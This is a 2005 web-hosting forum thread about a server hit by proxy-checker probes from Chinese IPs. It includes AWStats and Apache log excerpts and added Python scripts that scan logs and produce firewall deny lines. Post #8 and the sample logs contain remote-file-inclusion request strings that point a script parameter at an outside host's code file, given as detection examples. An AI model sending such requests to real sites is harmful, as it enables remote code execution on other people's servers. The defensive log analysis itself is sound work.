-
06-03-2005, 07:56 AM  #1  WHT Addict (Join Date: Nov 2004, Location: Marietta PA, Posts: 138)
Odd page visits and large hit count
Over the last few days I have noticed that my visits from China have greatly increased, which is never a good thing (no offense to anyone from that area).
In the AWStats section where it shows you the most visited pages, I am seeing page hits for URLs on other servers instead. 99% of these links lead to a prxjdg created by PRX4EVER with site address http://prx4ever.virtualave.net/ps/ (the link no longer exists).
I have attached a screen shot of the AWStats.
Whatever this is, it has eaten up 200 MB of bandwidth overnight, which is not a big deal currently.
I have run rkhunter and chkrootkit and both give a clean bill of health.
The netstat output does not show any weird ports open, though it shows about 50 China IP addresses connected to my IP via port 80.
My website (not the hosting one) shows a who-is-online count of over 100 users lately.
Now the site I mention is running Mambo 4.5.2.1. It is also the first site that was added to our cPanel server, so I sometimes see hits for the other domains in our logs, i.e. people going to whois.sc for another domain on the server show up in my AWStats.
The server is Fedora Core 2 protected with the APF firewall.
I don't know if this is a new attack because I just saw it start up on the 1st of June. I have checked server logs and do not see anything weird; the temp dir has the t bit and there is nothing hidden in there.
If anyone has any thoughts on this please give us a shout or post in here.
Oh yeah, and tcpdump and Ethereal do not show any strange traffic on the NIC, though I see many repeat hits from the same IPs on port 80, sometimes a few hundred at a time.
Digital Offensive
http://www.digitaloffensive.com
Take an offensive approach to Security know what your foes know!
-
06-03-2005, 08:14 AM  #2  WHT Addict (Join Date: Nov 2004, Location: Marietta PA, Posts: 138)
More oddities:

Connect to site from
Origin                                                          Pages   Percent    Hits   Percent
Direct address / Bookmarks                                        305    4.3 %      341    2.2 %
Links from a NewsGroup                                              -                 -
Links from an Internet Search Engine                             2619   37 %       2772   18 %
  - Google                                                       2609              2762
  - Baidu                                                           5                 5
  - Unknown search engines                                          3                 3
  - Yahoo                                                           2                 2
Links from an external page (other web sites except search engines)
                                                                 4146   58.6 %    12284   79.7 %
  - http://www.hit2seek.com/portal.php                            136               136
  - http://www.happyfeeds.com/happy.php                           129               129
  - http://softfeed.com                                           113               113
  - http://sohohunter.com                                         102               102
  - http://www.highway61.com                                       98               789
  - http://www.flyppc.com/portal.php                               91                91
  - http://www.allgame.com                                         86                86
  - http://www.lenovo-search.com                                   75                75
  - http://www.yoomy.com/portal.php                                41                41
  - http://www.found-best.com                                      40                40
  - http://www.esearchall.com/portal.php                           38                38
  - http://www.mygole.com                                          34                34
  - http://portal.pengs.com                                        33                33
  - http://www.searchorfind.com                                    33                33
  - http://www.searchmirth.com                                     31                31
  - http://www.gogosearch.net/portal.php                           31                31
  - http://www.mobygames.com                                       31                31
  - http://www.paxgamers.com                                       30                30
  - http://www.jebest.com                                          28                28
  - http://www.telefragged.com                                     27                27
  - http://www.themanroom.com                                      27                27
  - http://www.sharkygames.com                                     26                26
  - http://www.nukewinter.com                                      26                26
  - http://quicky-search.net                                       26                26
  - http://www.gamepro.com                                         25                25
  - Others                                                       2789             10236
-
06-03-2005, 08:28 AM  #3  WHT Addict (Join Date: Oct 2004, Posts: 133)
Browse through the account's folders.
See if there are any unusual files.
It is possible that somebody hopes to exceed the bandwidth for this site. This is just a suggestion and a possible reason.
The lack of a logical reason for this is even more disturbing.
I believe you would have felt better if you had found something.
If there is nothing, absolutely nothing strange, my guess is that
somebody wishes to force bandwidth exceeding.
I hope that somebody will manage to help you.
-
06-03-2005, 08:30 AM  #4  WHT Addict (Join Date: Nov 2004, Location: Marietta PA, Posts: 138)
Arny, thanks. I am not worrying about the bandwidth, but you are right, I would have felt better if the logs showed something or if there was a trojan found. I have 2000 GB to use and the server with all the sites on it has never broken 20 GB.
-
06-03-2005, 08:33 AM  #5  Junior Guru (Join Date: Dec 2004, Posts: 224)
Have you enabled hotlink protection? Other domains can steal your bandwidth that way.
-
06-03-2005, 08:35 AM  #6  Junior Guru (Join Date: Dec 2004, Posts: 224)
Also, you could disable directory indexing for the folders which needn't be accessed using URLs.
-
06-03-2005, 08:42 AM  #7  WHT Addict (Join Date: Nov 2004, Location: Marietta PA, Posts: 138)
No, I haven't, but I can do that. The issue, though, is that I don't think they are linking to my files, especially since all the links involved are proxy checking servers.
Though thanks for the tip.
-
06-03-2005, 08:58 AM  #8  Junior Guru (Join Date: Dec 2004, Posts: 224)
Do you have mod_security installed? You can set up custom filters to stop access to other URLs using your domain in the browser. Check the Apache domlogs for this domain and you should be able to see entries like:
...GET /index.php?conf=http://www.domain.com/.../newcmd.gif.....
something like this.
Check if these are from a particular IP.
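As an added example (not code from the thread), here is a small log scanner that does the two checks the thread calls for in one pass over a cPanel-style combined access log: it flags query-string parameters whose value is a remote URL, which is the shape of the "?conf=http://..." request described in the post above, and it also flags requests whose target is an absolute URI, the form a client sends to an HTTP proxy, which is what produces the hits on other servers' URLs that the first post saw in AWStats. The log lines, hostnames and IPs below are constructed for the example; the parameter names `conf`, `inc` and `go` are assumed, not taken from any real application.

```python
"""Scan Apache combined-format access-log lines for remote-inclusion and
open-proxy probes. Added example; the sample log is constructed."""
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Combined log format: ip ident user [time] "method target proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: (?P<proto>[^"]+))?" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)'
)
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines (documentation IPs; parameter names are assumed).
SAMPLE_LOG = [
    '203.0.113.10 - - [03/Jun/2005:11:02:07 -0400] "GET /index.php?conf=http://198.51.100.7/tools/newcmd.gif HTTP/1.1" 200 1833 "-" "Mozilla/4.0"',
    '203.0.113.10 - - [03/Jun/2005:11:02:09 -0400] "GET /index.php?option=com_content&id=5 HTTP/1.1" 200 9124 "-" "Mozilla/4.0"',
    '203.0.113.10 - - [03/Jun/2005:11:02:12 -0400] "GET /admin/index.php?inc=http%3A%2F%2F198.51.100.7%2Ftools%2Fcmd.txt%3F HTTP/1.0" 404 312 "-" "libwww-perl/5.79"',
    '198.51.100.44 - - [03/Jun/2005:11:03:01 -0400] "GET /index.php?go=https://198.51.100.7/x.txt HTTP/1.0" 200 1833 "-" "Mozilla/4.0"',
    '192.0.2.5 - - [03/Jun/2005:11:03:20 -0400] "GET /images/logo.gif HTTP/1.1" 200 4021 "http://www.example.org/" "Mozilla/5.0"',
    '203.0.113.77 - - [03/Jun/2005:11:03:40 -0400] "GET http://proxy-judge.example/cgi-bin/prxjdg.cgi HTTP/1.0" 200 512 "-" "-"',
]


def classify_request(target):
    """Return [(kind, detail)] findings for one request target.

    'proxy-request'  : target is an absolute URI (scheme + host), i.e. the
                       client treated this server as an HTTP proxy.
    'remote-include' : a query parameter carries a remote URL; parse_qsl
                       percent-decodes, so http%3A%2F%2F... is caught too.
    """
    findings = []
    parts = urlsplit(target)
    if parts.scheme and parts.netloc:
        findings.append(('proxy-request', f'{parts.scheme}://{parts.netloc}{parts.path}'))
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if REMOTE_URL_RE.match(value.strip()):
            findings.append(('remote-include', f'{key}={value}'))
    return findings


def scan_access_log(lines):
    """Return [(ip, kind, detail)] for every suspicious request in the log."""
    results = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not combined-format
        for kind, detail in classify_request(m.group('target')):
            results.append((m.group('ip'), kind, detail))
    return results


def offenders(findings, threshold=1):
    """Count findings per client IP; return [(ip, count)] at or above threshold."""
    counts = Counter(ip for ip, _, _ in findings)
    return [(ip, n) for ip, n in counts.most_common() if n >= threshold]


if __name__ == '__main__':
    hits = scan_access_log(SAMPLE_LOG)
    for ip, kind, detail in hits:
        print(f'{ip:15} {kind:15} {detail}')
    print('per-IP totals:', offenders(hits))
```

Run it against a real domlog with `scan_access_log(open(path))`; the per-IP totals are what you would feed into an IP ban, and the `remote-include` details are the patterns a mod_security filter would need to match.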
-
06-03-2005, 09:56 AM  #9  WHT Addict (Join Date: Oct 2004, Posts: 133)
And if they are from particular IP addresses or a whole IP range, I'm thinking of one nice IP ban.
-
06-03-2005, 10:05 AM  #10  WHT Addict (Join Date: Nov 2004, Location: Marietta PA, Posts: 138)
Yeah, I am thinking of blocking China for a few days.
-
06-03-2005, 11:08 AM  #11  WHT Addict (Join Date: Nov 2004, Location: Marietta PA, Posts: 138)
Here is more info. It looks like all the scripts these people are looking for don't exist, though I already knew that. I guess there is a new hack out there searching for vulnerable scripts:
[Fri Jun 3 11:04:56 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:04:56 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi
[Fri Jun 3 11:04:34 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:04:34 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi
[Fri Jun 3 11:04:31 2005] [error] [client 218.56.238.52] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:04:31 2005] [error] [client 218.56.238.52] File does not exist: /home/xxxx/public_html/~mana_/prxjdg.cgi
[Fri Jun 3 11:04:28 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:04:28 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi
[Fri Jun 3 11:04:18 2005] [error] [client 218.56.237.242] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:04:18 2005] [error] [client 218.56.237.242] script not found or unable to stat: /home/xxxx/public_html/ip.cgi
[Fri Jun 3 11:04:14 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:04:14 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi
[Fri Jun 3 11:04:13 2005] [error] [client 218.56.238.52] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:04:13 2005] [error] [client 218.56.238.52] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/proxycheck.pl
[Fri Jun 3 11:04:11 2005] [error] [client 218.56.238.75] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:04:11 2005] [error] [client 218.56.238.75] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/search
[Fri Jun 3 11:04:06 2005] [error] [client 218.56.238.75] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:04:06 2005] [error] [client 218.56.238.75] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/search
[Fri Jun 3 11:03:56 2005] [error] [client 218.56.238.52] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:03:56 2005] [error] [client 218.56.238.52] script not found or unable to stat: /home/xxxx/public_html/ip.cgi
[Fri Jun 3 11:03:53 2005] [error] [client 218.56.239.72] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:03:53 2005] [error] [client 218.56.239.72] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/search
[Fri Jun 3 11:03:39 2005] [error] [client 218.56.237.242] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:03:39 2005] [error] [client 218.56.237.242] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/search
[Fri Jun 3 11:03:32 2005] [error] [client 218.56.238.52] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:03:32 2005] [error] [client 218.56.238.52] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/proxycheck.pl
[Fri Jun 3 11:03:28 2005] [error] [client 218.56.239.72] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:03:28 2005] [error] [client 218.56.239.72] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/search
[Fri Jun 3 11:03:27 2005] [error] [client 218.56.232.152] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:03:27 2005] [error] [client 218.56.232.152] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/search
[Fri Jun 3 11:03:25 2005] [error] [client 218.56.239.32] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:03:25 2005] [error] [client 218.56.239.32] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/search
[Fri Jun 3 11:03:04 2005] [error] [client 218.56.237.242] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:03:04 2005] [error] [client 218.56.237.242] script not found or unable to stat: /home/xxxx/public_html/ip.cgi
[Fri Jun 3 11:02:44 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:02:44 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi
[Fri Jun 3 11:02:32 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:02:32 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi
[Fri Jun 3 11:02:28 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:02:28 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi
[Fri Jun 3 11:02:09 2005] [error] [client 218.56.238.52] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:02:09 2005] [error] [client 218.56.238.52] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/proxycheck.pl
[Fri Jun 3 11:02:07 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:02:07 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi
As you can see they are all China IPs, which have now been blocked.
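The error_log excerpt above is a good input for a small aggregation script, so here is one as an added example (not code from the thread). It parses lines of the shape Apache writes for a missing file or CGI, discards the paired `404.shtml` entries (Apache logs the missing custom error page once per failed request, so those lines carry no extra information), groups the remaining missing paths per client, and flags a client either because it asked for one of the proxy-checker script names seen in the post (`prxjdg.cgi`, `proxycheck.pl`, `smartsearch.cgi`, `ip.cgi`, treated here as an assumed watch list) or because it probed several distinct non-existent scripts. The flagged IPs are rendered as `apf -d HOST "comment"` lines, APF's deny syntax; the sample log lines and IPs below are constructed.

```python
"""Group Apache error-log 'missing script' entries by client and flag
scanners. Added example; the sample log is constructed."""
import re
from collections import defaultdict

# Apache 1.3/2.0 error_log line: [time] [error] [client IP] message: path
ERROR_RE = re.compile(
    r'^\[(?P<time>[^\]]+)\] \[error\] \[client (?P<ip>[\d.]+)\] '
    r'(?P<msg>File does not exist|script not found or unable to stat): (?P<path>\S+)$'
)

# Assumed watch list, taken from the script names in the post above.
PROXY_PROBE_NAMES = {'prxjdg.cgi', 'proxycheck.pl', 'smartsearch.cgi', 'ip.cgi'}
# The missing custom 404 page is logged alongside every miss; it is noise here.
IGNORE_BASENAMES = {'404.shtml'}
# A client asking for this many distinct missing scripts is scanning, not browsing.
PROBE_THRESHOLD = 3

# Constructed sample lines (documentation IPs, made-up account path).
SAMPLE_ERROR_LOG = [
    '[Fri Jun  3 11:04:56 2005] [error] [client 203.0.113.40] File does not exist: /home/site/public_html/404.shtml',
    '[Fri Jun  3 11:04:56 2005] [error] [client 203.0.113.40] script not found or unable to stat: /home/site/public_html/cgi-bin/smartsearch.cgi',
    '[Fri Jun  3 11:04:31 2005] [error] [client 203.0.113.52] File does not exist: /home/site/public_html/~mana_/prxjdg.cgi',
    '[Fri Jun  3 11:04:13 2005] [error] [client 203.0.113.52] script not found or unable to stat: /home/site/public_html/cgi-bin/proxycheck.pl',
    '[Fri Jun  3 11:04:11 2005] [error] [client 203.0.113.75] script not found or unable to stat: /home/site/public_html/cgi-bin/search',
    '[Fri Jun  3 11:04:06 2005] [error] [client 203.0.113.75] script not found or unable to stat: /home/site/public_html/cgi-bin/search',
    '[Fri Jun  3 11:03:53 2005] [error] [client 198.51.100.9] File does not exist: /home/site/public_html/favicon.ico',
    '[Fri Jun  3 11:03:50 2005] [error] [client 192.0.2.7] script not found or unable to stat: /home/site/public_html/cgi-bin/a.cgi',
    '[Fri Jun  3 11:03:51 2005] [error] [client 192.0.2.7] script not found or unable to stat: /home/site/public_html/cgi-bin/b.cgi',
    '[Fri Jun  3 11:03:52 2005] [error] [client 192.0.2.7] script not found or unable to stat: /home/site/public_html/cgi-bin/c.cgi',
]


def basename(path):
    return path.rsplit('/', 1)[-1]


def parse_error_log(lines):
    """Return {ip: set(missing paths)}, with the 404.shtml noise removed."""
    probes = defaultdict(set)
    for line in lines:
        m = ERROR_RE.match(line.strip())
        if not m:
            continue  # not a missing-file line (or a different log format)
        if basename(m.group('path')) in IGNORE_BASENAMES:
            continue
        probes[m.group('ip')].add(m.group('path'))
    return probes


def classify(probes):
    """Return {ip: reason} for clients that look like scanners.

    A watch-list hit is reported on its own; otherwise the client is reported
    only if it touched PROBE_THRESHOLD or more distinct missing scripts, so a
    single broken link from a normal visitor does not get flagged.
    """
    verdict = {}
    for ip, paths in probes.items():
        hit = {basename(p) for p in paths} & PROXY_PROBE_NAMES
        if hit:
            verdict[ip] = 'proxy-checker probe: ' + ', '.join(sorted(hit))
        elif len(paths) >= PROBE_THRESHOLD:
            verdict[ip] = f'{len(paths)} distinct missing scripts'
    return verdict


def apf_deny_lines(verdict):
    """Render APF deny commands (apf -d HOST "COMMENT"), sorted by IP string."""
    return [f'apf -d {ip} "{reason}"' for ip, reason in sorted(verdict.items())]


if __name__ == '__main__':
    flagged = classify(parse_error_log(SAMPLE_ERROR_LOG))
    print('\n'.join(apf_deny_lines(flagged)))
```

Feed it the real file with `parse_error_log(open('/usr/local/apache/logs/error_log'))` (path as on the poster's cPanel box; adjust to your layout), review the rendered deny lines, and only then run them; the threshold and watch list are the two knobs to tune against your own traffic before trusting the output for an automatic ban.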
-
06-04-2005, 12:58 AM  #12  Junior Guru (Join Date: Dec 2004, Posts: 224)
As you've blocked those IPs, do you still have issues?
-
06-04-2005, 03:00 PM  #13  WHT Addict (Join Date: Nov 2004, Location: Marietta PA, Posts: 138)
I installed BFD last night and it has blocked several hundred China IPs.